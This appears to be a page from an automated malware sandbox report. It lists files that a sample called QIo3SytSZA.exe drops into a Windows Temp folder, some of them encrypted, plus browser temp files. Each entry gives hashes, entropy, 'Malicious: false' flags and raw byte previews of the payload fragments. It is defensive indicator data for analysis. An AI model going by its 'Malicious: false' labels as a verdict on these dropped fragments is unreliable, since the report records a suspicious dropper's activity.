t.f;E.u....j.^....1L...A..t!.B..7w.f.A......f#.....f;.u.......f....l...3._^[....A.f;.t.f;E.u......-....t.H...t.H...u...A...A....U..QSV..W...3;........E...................L.........E.,K.......K..

C:\Users\user\AppData\Local\Temp\Excitement

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	6.689568278143388
Encrypted:	false
SSDEEP:	1536:FO4qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4V:Q4qv+32eOyKODOSpQSAU4V
MD5:	B6513387CB33B9E3B21894CB546FD15A
SHA1:	708FBAB2683B0C2CF81ABF9C25B87D338A6F326D
SHA-256:	B3166B4CA47BBC68DDFE4706E8D55B6A8B9E3CFD5A6AEB8CFD74F21959D46336
SHA-512:	582EE6A04F3686352C10ACDD1DBFD57D75C41D779E84BD6BA49499E9B89620976C20F5D59E3B980FD0BF1CAA6224C41AB5512D0B57390688C17470E60FDED39E
Malicious:	false
Preview:	...3.3...\...................`...+.............`...........u.;.......!..`....V...\.......3.3..................stS;.u....`....@...\...............................`............@A..........\...;.u...t4..s......;.u....`.....A...\.....3....`.....\.....A...s..................F;..........,......P..`...P..0...h....P...........,.......................+.............Y...........tE.<..!J.........3.P........,.........P..0...h....P.@........,.................3......3.P........,.........P..0...h....P........2..E............,....j..d...t...t.3.3......0........0......F..;.u....q.....,.....ss....0.....,...C..,....S...3.........,...P......P..0...h....P.c.........................P....YYj.X.......,.............t.@..3..K.................;.......).......!.........3.3.......3............;.......=....................3...;3......................G..;.u.......tK........ss..............C.......03.P..................P......h....P.K....................tn3..t...3................A;.u..tL..ss.........

C:\Users\user\AppData\Local\Temp\Finnish

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.592141256923057
Encrypted:	false
SSDEEP:	3072:IpIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coR/:7phfhnvO5bLezWWt/Dd314V14ZgPZ
MD5:	13B516AC4620CABA657C929217376B24
SHA1:	46D9A25B5B4ED6CCAEE6E205A5BB16DF467B81B7
SHA-256:	A0F145A2675DF3F0F3BF3EF9F4AD6713B50A8F77B6EDEC0A1E4DBF623B73CCE7
SHA-512:	76C0DDC6EA08BE9E94AB707FB1395CF62C787E311E89784E9D8E19905F533ECF2889C044D90BEA0303CF38AC88423BB4949E4FCD2B96E25F3D70F27325A0D233
Malicious:	false
Preview:	I8.A..\|....D..t..@8.@...j..E.PW....I....u:..$.I....Q..\|....L..t..I8.A..\|....D..t..@8W.@....(.I..X....u.W....I...t8..$.I....Q..\|....L..t..I8.A..\|....D..t..@8W.@....(.I.....u.........F......>_^3.[....U...$VW...M..&....E..@..0....p...N..U.......u.....I...u=..$.I....Q..\|:...L:.t..I8.A..\|:...D:.t..@8.M.h..I..@....M...L.@.j..0.E.P.L.......u.....I.P.M......M.......U.M.......M..E.P.\...M.......M......_3.^....U...0...SVW.}...G........W...]..J......M...h..I..9M.....u....H..\|1...D1.t..@8.H...\|1...D1.t..@8.@...!...j...t...........PS.............G.P.V...YP.M...#...].j.WS.u.....I..............tw.E..x..r..@..H..+.....uIS..;..q..Y;.u:S.M...#...M......U.M.......M..E.P.}[...M......M......V.M.WSW....P.........@..j.j..H....[......$.I....I..\|1...T1.t..R8.B..\|1...D1.t..@8.@...E..(.u.j.P.(...S.i......_^3.[....U..SV.u...W.F....Q....V....J.......N...I..o...j.PRW....I..u......3....F........u3.&...$.I....I..\|....T..t..R8.B..\|....D..t..@8.@.....>_^3.[]...U..SVW......I......R..\|2...L2.t..I8.y..\|

C:\Users\user\AppData\Local\Temp\Johns

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	132096
Entropy (8bit):	6.62530461626873
Encrypted:	false
SSDEEP:	3072:fnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBV:fj0nEo3tb2j6AUkB0CThp6vmVnv
MD5:	E1B0AF5D443066EEA94B61D99E0EE62C
SHA1:	6F75E9962D4AC523202CF7BBFE5A232EFA3D173E
SHA-256:	E1DF43031FA795CE7934C5904C6B313DB4562AE915B4515AEC46C864D05FBD94
SHA-512:	6D124AD38CA0D4A60EF0D950137CACCB8A70E00D0917C4AE5FD915EE238CFB23E12F49311E8EFB13C6F3FD3AE254963FA46C2EAA3F6E812C612DEBB512F30990
Malicious:	false
Preview:	E._^[....U..E.SV.u...WVj..0j.S..d.I.....u6..0.I...zu).6j...t.I.P..p.I..M.....t.V.6Pj.S..d.I....._^...[].U..E.SV.u...WVj..0j.S..d.I.....u6..0.I...zu).6j...t.I.P..p.I..M.....t.V.6Pj.S..d.I....._^...[].SVW..3.j.[._..w......G.3..........Q....Y..9w.v......P.M....F;w.r.._^[...V..~..t.3.PPP.v.P.v...0.I.j..v......YY.v...`.I..6.B...Y^.U..QSV.u....M...WVj..1.E.SP....I.....u7..0.I...zu*.6j...t.I.P..p.I..M.....t.V.6PS.u.....I....._^...[..SVW...Sj.3...t.I.P..p.I.....t.j.SP..,.I....._^...[.U..VW.u...3.j...t.I.P..p.I.....t.j.P..(.I....._...^].U....SQQ.M......M.......t..z.....t.....2.M........[..U...dSVWQQ.M..`...Q.M.......u.2.....3.E.j Q...M.P.M....}..M.M.M.......M.....E.....E. ....E..E.j.Z#.M..E.E.PWWX.....P.u..u.Q..T.I.........9].t,.E.Pj.j.XPWW.u...@.I..........u...`.I..E..E.h....j.h.jL.....I.......n........e.......I.V.E.....I.....M...h....j.j.h.jL.....I....../........&....E.P.u..)....}.........Q.E.f.E...PWV.E.....f.E....E......%...........Q.E.f.E...PWS.E...................E(.

C:\Users\user\AppData\Local\Temp\Notified

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	6.0641412562501396
Encrypted:	false
SSDEEP:	768:taHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mW:tMbFuz08QuklMBNIimuzaAwusj
MD5:	7002C079AC3F38F0B30DC8B78281F49B
SHA1:	DFA54C9B95F4A98C8ED91FE9A3D8EBADBFAF7C27
SHA-256:	667FFB5D78CB41B44D66070137E1A8B9624B9183F3C9880E2D084CB9E5E0AD9A
SHA-512:	45D36F6C9FD776EA19D7F99C6FC09D270B2FBFAC7C00EC7CB283BC50D5F9F48FA78085A74906580D65946E6451922DF327C406A0FFF19037D425B53E1009E1AE
Malicious:	false
Preview:	?...._..?...@^..?....]..?....]..?...@\..?....[..?....Z..?....Z..?...@Y..?....X..?....W..?....W..?....V..?....U..?....U..?...@T..?....S..?....R..?....R..?...@Q..?....P..?....P..?...@O..?....N..?....M..?....M..?...@L..?....K..?....J..?...@J..?....I..?....H..?....H..?...@G..?...............................>Y..."G=.......>..lW.E=.......>j..b.H=.......>..^IL.#=.......>..(i.&I=...h...>g..P'E=...p...>..)..D=.......>..&...N=...x...>.;...@=...H...>Qy.u.3=.......>..c...-=.....@.>R...:==.......>.....{M=.....@.>......C=...`...>b....B=.......>..td.C=...$...>...9..O=.......>B. N..C=.......>.j.&..==.......>......<=.....@.>.`l.r.G=.......>!...ls1=.......?..8....=.....@.?.. ..mN=...&...?..Ut.Q$=...X...?PiB.{^C=.......?Gv.7..2=.....@.?q.l..m+=.......?!..j7./=...d...?..L ..C=.....`.?.m....+=...P. .?5O.d%..=.......?.r....<...(...?.Hga.2=.....@.?.C....I=...r...?..s...A=...*...?..GTi.A=.... `.?.K...D=...r" .?.Dp.`q.=...L$..?..~...G=...4&..?......D=....'@.?......E=....)..?'P.....<....+..?f.4.cC

C:\Users\user\AppData\Local\Temp\Olive

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	68608
Entropy (8bit):	6.5506955847790325
Encrypted:	false
SSDEEP:	1536:3AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzG:3g5PXPeiR6MKkjGWoUlJU6
MD5:	7116DB0FAC7AB6D372FD65E771AB19C5
SHA1:	0CD89CFA95053D7A72FC10E71A9D3491561C54EB
SHA-256:	A145A42F62FD6415D90EB19AA0F8BD7835D4F69C3CABCD0F0B33823939430176
SHA-512:	013910D34675D101BBF70C459FF75E108A966858650AE40D09CC5508A75D18B2CB4CCE3F183E5C96BE51F7A168FED3CDA3526B45EE922A839966221A76CE3AA7
Malicious:	false
Preview:	.(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.\|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....\|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h.

C:\Users\user\AppData\Local\Temp\Quantity

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	150528
Entropy (8bit):	6.662173504277403
Encrypted:	false
SSDEEP:	3072:oE0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNX:olbfSCOMVIPPL/sZ7HS3zcNX
MD5:	7A4D858A28BF1021A505BD7B887471C8
SHA1:	3BC3A082967CD35E731F0ED204578D24B82EAE43
SHA-256:	C976FE1259CA5F8AC1B2824CF81AA127B3A24CF6153F15CA73CAC9FE90905F7E
SHA-512:	BF88068FDBCBED8A13DDDA3F7E9BCCF8E43770791BEC9C7BB554ABF9BC0BB19956F4927886557DA346731C307C1349CDA2A59C5402702DB441DFE0B64A33BFD9
Malicious:	false
Preview:	L....A .........w.....H. .A...................A;.r..M._^3.[..@....]..U.....c...E.......u..w...Y.M..E.IH;A.u.3..SSVWh .....n.......Y..t..u.......vH..W.u.'.._.....YY;.u..(..........W._..Y_..^[..].}..u..eZ...E..@H....Ku..E..xH..L.t..pH.J_..Y........E.3..HH.E...P....u...@.L..u..E..E.E.Pj......}..YYt....L....L..v....=."M..u.j.j......YY..."M.....j.h..L..:?..3..u..wb......@.L...P...t.9wLt..wH..uh.]..j..9d..Y.u..wH.u.;5..L.t0..t........u.....L.t.V.s^..Y...L..GH.5..L..u.....E...........u.j..'d..Y....>....U... ...L.3.E.SV.u..u.......Y..u.V.....Y3.....W3....M.9...L.......A..0.M.=....r...........................P....I..........E.PS....I.........h.....F.WP..W...^....3......C9].vQ.}...E.t!.H...t..........L...A;.v.....8.u.F.........@...u..v...............^....~.3..~........9=."M.t.V................h.....F.WP.qV.....kE.0.E.....L..E.8...t5.A...t+..............s.....L..D..B..A.;.v....9.u.E.G....E...r.S.^..F....................E..N.j.....L._f...R.f...I....u.V.....Y3._.M

C:\Users\user\AppData\Local\Temp\Reflected

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	99328
Entropy (8bit):	7.998203112133576
Encrypted:	true
SSDEEP:	3072:hUO+myQywOqrro8cWOPz6AjZHZTeWpoIp:umy7nnIOL6AjZHZK/Ip
MD5:	CA7B64CEE6D9877398DFECBE57A31E58
SHA1:	F269EA6ECA1FBB1D6C7288532B736BF9CA80B816
SHA-256:	5B3728625673DFCA9D3BEAFD7DD83E507B013BCE995E56123549FB48EF9788C6
SHA-512:	1AF496087574D4BF1E4B53AE65885DBD3CFFD3B78AFF731828927E8862297A13E550198650AE5215837E0F8C3397379AC16A008FCD9C7A8646BFAE2A61AA6F38
Malicious:	false
Preview:	...k,R...z....>k........I.=.tz..e.>....L.)$..u.xi&..w.....!.....FH,. ..(RK..Q.......$."....e`F.t...,.rId..%...&.....H.X&....o..D0.E1....U.m.....l;.y.Ee..f....C.Mr.+W....Y...<...[......."...}.W.t.s....4..z*..H..8r..^....4..(%]F.......h..%8.g..I...P\....E0p.txM2.+X_6{\f..M.v`$p&v.....0...7....5H..xb..-+a........Wx.4']:.$....VA.z.........z.+....D..t.D>.......?..V..U..iXy...Y.]...t..@.b3.....: .........p.~.......Z...Bw!.P.^]..^St.."{..Ev@^]...d...;.pv..fR.l.lwg..:.?..........u...O..:`TvV.3.F.....?)~..n\.....s..'N...?.F.P..&....(..b...K.....RV.=V..v.eU.6p..J..V....H...h. Ff..O.<....!..m.J$`gQ....-I.TJe.....1......8.b..Dp......"zwQQ.g..:..D.Mb.....qc....O4......."..S.....Ak.....-.....r.q...w....Q........0.....X/.+).>x..0...5y.2....m.U.....! ..p.A..$.\|P6m.x...p..f.......GM.....t.8.8H....P......k@.vW...5..qw....[.NZ..5....K-N.. MS..+.;k..3u}f.(:....".AU.7....V...E/........J.#..$.+>.D..P..cm.&.F..te."..>.s.P^...dGqx.......#...S..5es..

C:\Users\user\AppData\Local\Temp\Respected

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	5.760029834643375
Encrypted:	false
SSDEEP:	1536:8lDfFgQa8BpDzdZPp7HE+tKA3QkvyNf7Xw2U0pkE:YdgQa8Bp/LxyA3laW2UDE
MD5:	E7C05CA7D940E3408DF0FAE2A74CE384
SHA1:	61046CB2850564820AB3711030E9604FA05BDB0B
SHA-256:	D79E6E2032CE75882D234354F85F932C3ECDE877F2D580CB9AB1D0748C613E0A
SHA-512:	BB073E6FF27D33B3D7C4D522AA80B5B038D89D41A92CC8D4036EEABF7247C4FD4001B8E2F676BD1972F1FE7B1F83D315CAE28B011F04B34C46A2B36F5B5D82D2
Malicious:	false
Preview:	.C...........F.......O.........K......P.......................w..^...t/.N......O...F.......P...F...........j.V........._..G...~.........P.......w.t..v.............C......v....F.......Q.....+...K.....kQ........9.........!....w..^...t........v....7.....H.............)A..$..)A..C...............:Q.....t..../......]..j....E....F.......................Q......._.....................G..p........N.............C.............>...N.....u....dQ............N.;...c.........M.....t.........].......E....C........h.................;..............V...7...................G..X...`....[..X...I......S...$..A....U..<........HQ......._............9Q...7.F.............0k...C..v..E.;...BQ...X...tC.N.............F.....P.Y.......P.E..0.F...AP.....^.....N.3..f..H.....................O..q...t.Q.....w..G............4....N.;............nN.....t...........]..R....E....C.............M...H......O...$.(A.............O...............ER...7...........7........xO...................].......E....F...........

C:\Users\user\AppData\Local\Temp\Subdivision

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	60416
Entropy (8bit):	7.99724469298468
Encrypted:	true
SSDEEP:	1536:8iMmHj5Cti3ogIVrIRI0uomQ/pSmM46EFxOR:88wzRVrI60uom+p7HS
MD5:	18D5B284CFE22CC2D89AB4C8D871931E
SHA1:	28F9050B36EC12B7F700A71D8C5A8823A153F5F4
SHA-256:	CBF82B49DC2C10BF0AF336903D01F9B4048FC83F00239E8E8A218F1F4915C73B
SHA-512:	5AF4506133C43EC2E505F4ED8D73C5B0B8BBA6F66664B02BAAD137C3EDD26195FFB5D8F1D2B4FE5C07B536F924C120E72E66C782E730F480D787EED475006C4D
Malicious:	false
Preview:	o.=....tj6Lk.........-].....y......e.;....l...N.F..ut..X..).U.P.)...a.<D_v..D.@......Mc.+........'...uh......9?Z.......z?5.....6..#....Q...\"?._+\............+.>.HJ!....F...j..P.P..6..A.r.-.I.5.d.T..-.....}i...6.m..n.H........Gc..y.....G../..u.u...N..:.V...ek..8z.l.[..._`i.....l..;#..).=.?...^.Q/.S.#.2.j`.d...x..[.R.%%.@2@mX.m..R...Qt...7...e...QM..@..{...P.b4~).T..F&..90........+E.kt...K.}=......#..j.3~.VHg.b...jk..`..9..I..K.......}.....[Q'v....CS......{.e^.a...J.. j..eR..m.0M&.7....q.................w.y...{a....@.b.tn.0...a..Z..f$....8PwK..Bb.......{v}....%z..O.o....-.yLz/..q......,.En..P..6[.Z!..LL..uvoA..J...k....r-.....w..KV)..kVO...#......p.G&...........0k.$..RC>.....S.(6......uF..6.f.2.....1.%.ki..AA$...)a..........^.[.4"...$.N....:.h..4..O......B..$..z.!...C.G..K.:..,D.mQ...7..8..`.2. Eu......H...l...QDU..0>r..I..e....m..$.;..t~67......{.s..."8.A@/+...:\..~`~>E..rj..S9.j.j..]\|/-w..Bg9..o.U...\|bng....-\T.....lo...i.W.\.. .Y.

C:\Users\user\AppData\Local\Temp\Wife

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	134144
Entropy (8bit):	4.752817072791519
Encrypted:	false
SSDEEP:	768:Tx/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qcDp:TdKaj6iTcPAsAhxjgarB/5el3EYrw
MD5:	380C1F3E0375453A86E78080DB197A21
SHA1:	0C9E9846195C8A062EF6DC403488DCD523E3A947
SHA-256:	316162A748CB78AE4D685687CB4A3BA1AD03D00BF28BFA7DA3DF3D07EE48EEDA
SHA-512:	C217A6E8C01E7C619FA6CCA6DB6DAE39A237CF2C47DEEFE49052198B502A0004E07A14F41DF514E0C5FF8C09DFF421D986F85F832BABCA8BC2D40BAD0AC3FBAB
Malicious:	false
Preview:	.........................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.................r.r.r.r.r.r.r.r.m.m.m...m.m.m.m.m.m.m.m.m.m.m.m.m...m.m.m.m.m.m.m.........m.............m.....r.m.m.r.r.r.r.r.r.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.z.z.z.z.z...j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.s.s.s.s.s.j.j.j.j.s.s.s.s.s.!.!.!.!.!.!.!.!.!.!.!.!.!.....!.!.!...!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.s.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.r.r.r.r.r.r.m.m.m.m................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\a24b674f-ac25-47a0-946a-5bb131808652.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\cea0473f-cf19-45c2-b394-1e8740b451ef.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	31335
Entropy (8bit):	7.694019108205432
Encrypted:	false
SSDEEP:	768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
MD5:	6B72597205C77D3E40E1A35BEE403801
SHA1:	6BECEE055C6E057AF9475B6D651B4EE561D02F20
SHA-256:	C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
SHA-512:	7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1420
Entropy (8bit):	5.379988832613624
Encrypted:	false
SSDEEP:	24:YDG5LwRD0s/Up5fP1x5fn7Zu0QRWE5fR+nh0Qut5fxjK0ca18zL5vAFA0Vj5M:YDG5LOD0s8p5nX5/o0KWE5JC0Nt5pO0O
MD5:	CCA404F092624935FD076CD19EB3BFDC
SHA1:	41416C20F792BC498FC00AE1664785937CB9BB34
SHA-256:	609103EFFC33A37D1F04384483AE7F3778B408A8EE310EE7649CCEC69B2B11F3
SHA-512:	3EDB2FA47EAF8FA28DFBE3AF4CADC1E8572C709435D85010B3D23D2B3BC1041BAF77F3C463DD0FF33548A10749E50BE3CD0EF88D3939F7C7B81A675BA3207E2C
Malicious:	false
Preview:	{"logTime": "1005/085948", "correlationVector":"8sNXFnC9i2+S99lAzDH6Rq","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/085948", "correlationVector":"81A02D7FC86E45EDA6CBCA8671A98AFF","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/085948", "correlationVector":"NiTqUUpDli2IJjzrRApLSF","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/091044", "correlationVector":"4hXMqVe30Bl32fn1+6AOy1","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/091053", "correlationVector":"D7BB119EE9F4429BBF8B8E46242DB5E9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/091235", "correlationVector":"Wk5x1on3JpNq4FXPG6U9B5","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/091235", "correlationVector":"EC448E7330FA4F5EA1E7898FDD3F2CB6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/091436", "correlationVector":"Ltc1GKjZ6R4P7ed5oiO6YB","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/091437", "correlationVector":"A569DB44

C:\Users\user\AppData\Local\Temp\d2d8a8bd-0c48-4d33-b8f9-53b45b8cee82.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	154477
Entropy (8bit):	7.835886983924039
Encrypted:	false
SSDEEP:	3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
MD5:	14937B985303ECCE4196154A24FC369A
SHA1:	ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
SHA-256:	71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
SHA-512:	1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...\|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.\|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,\|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

C:\Users\user\AppData\Local\Temp\scoped_dir3684_119752304\2e782b36-4c0f-40ad-a81e-e541041913aa.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir3684_119752304\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
